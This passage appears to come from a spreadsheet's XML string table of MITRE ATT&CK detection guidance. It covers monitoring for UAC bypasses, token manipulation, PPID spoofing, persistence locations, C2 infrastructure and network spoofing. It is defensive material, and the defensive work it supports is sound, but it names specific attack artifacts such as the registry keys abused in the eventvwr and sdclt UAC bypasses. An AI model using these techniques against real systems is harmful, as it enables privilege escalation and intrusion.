    <t>Execution, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Execution, Lateral Movement</t>
  </si>
  <si>
    <t>Command and Control, Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Defense Evasion, Lateral Movement</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. 
There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;, &lt;code&gt; ImpersonateLoggedOnUser &lt;/code&gt;, and &lt;code&gt; SetThreadToken &lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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
Monitor for processes that can be used to enumerate user accounts, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t xml:space="preserve">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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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
</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)</t>
  </si>
  <si>
    <t>Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
Enable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. 
A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file. In cloud environments, monitor instances for modification of metadata and configurations.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. 
Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
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Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
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Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Monitor for access to S3 buckets, especially those that are not intended to be publicly accessible. 
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Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
    <t>Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which specify that the IP allocations are low or have run out; these EIDs may indicate a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for DNS traffic to/from known-bad or suspicious domains.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for web traffic to/from known-bad or suspicious domains. </t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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t>
  </si>
  <si>
    <t>Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>
    <t>Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</t>
  </si>
  <si>
    <t>Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces.</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;).(Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.</t>
  </si>
  <si>
    <t>Monitor Registry key additions and/or modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t xml:space="preserve">Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: &lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;
On macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the &lt;code&gt;kext_policy&lt;/code&gt; table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, &lt;code&gt;/var/db/SystemPolicyConfiguration/KextPolicy&lt;/code&gt;.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </t>
  </si>
  <si>
    <t>All login items created via shared file lists are viewable by using the System Preferences GUI or in the &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt; file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.
Otherwise, login Items are located in &lt;code&gt;Contents/Library/LoginItems&lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)
Monitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.
Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)</t>
  </si>
  <si>
